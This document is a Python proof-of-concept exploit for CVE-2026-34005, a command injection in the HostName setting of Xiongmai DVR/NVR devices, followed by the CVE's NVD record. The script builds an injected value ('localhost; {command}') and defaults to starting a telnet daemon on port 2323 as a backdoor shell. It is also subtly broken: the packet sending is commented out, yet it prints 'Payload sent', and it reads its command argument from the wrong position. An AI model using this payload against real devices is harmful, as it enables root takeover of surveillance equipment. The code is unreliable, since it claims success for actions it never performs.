CVE-2026-34005

#!/usr/bin/env python3 # PoC for CVE-2026-34005 # Requires socket and struct for DVRIP protocol framing (Conceptual) import socket def exploit(target_ip, target_port=34567, command="reboot"): # Note: Actual DVRIP protocol implementation requires binary framing. # This demonstrates the injection logic. # Malicious HostName payload with command injection # Using semicolon to chain commands in system() malicious_hostname = f"localhost; {command}" print(f"[*] Connecting to {target_ip}:{target_port}...") try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((target_ip, target_port)) # Step 1: Authentication (Logic omitted, requires valid credentials) # auth_packet = build_dvrip_login(user, pass) # s.send(auth_packet) # Step 2: Send Exploit Packet to NetWork.NetCommon # Payload structure usually includes Operation ID, Session ID, and Data # Injecting into the HostName field within the configuration data payload_data = { "Handler": "NetWork.NetCommon", "Action": "SetConfig", "Parameter": "HostName", "Value": malicious_hostname } # exploit_packet = build_dvrip_packet(payload_data) # s.send(exploit_packet) print(f"[+] Payload sent: {malicious_hostname}") print("[!] Check if device executed the command (e.g., rebooted or shell opened)") s.close() except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": import sys if len(sys.argv) < 2: print("Usage: python3 poc.py <target_ip> [command]") else: cmd = sys.argv[3] if len(sys.argv) > 3 else "telnetd -p 2323" exploit(sys.argv[1], 34567, cmd)

{"cve": {"id": "CVE-2026-34005", "sourceIdentifier": "[email protected]", "published": "2026-03-29T17:16:44.257", "lastModified": "2026-04-27T19:18:46.690", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "In Sofia on Xiongmai DVR/NVR (AHB7008T-MH-V2 and NBD7024H-P) 4.03.R11 devices, root OS command injection can occur via shell metacharacters in the HostName value via an authenticated DVRIP protocol (TCP port 34567) request to the NetWork.NetCommon configuration handler, because system() is used."}, {"lang": "es", "value": "En dispositivos Xiongmai DVR/NVR (AHB7008T-MH-V2 y NBD7024H-P) 4.03.R11 de Sofia, puede ocurrir una inyección de comandos del sistema operativo como root a través de metacaracteres de shell en el valor HostName mediante una solicitud autenticada del protocolo DVRIP (protocolo TCP puerto 34567) al gestor de configuración NetWork.NetCommon, porque se utiliza system()."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-78"}]}], "references": [{"url": "https://uky007.github.io/CVE-2026-34005/", "source": "[email protected]"}, {"url": "https://www.xiongmaitech.com", "source": "[email protected]"}]}}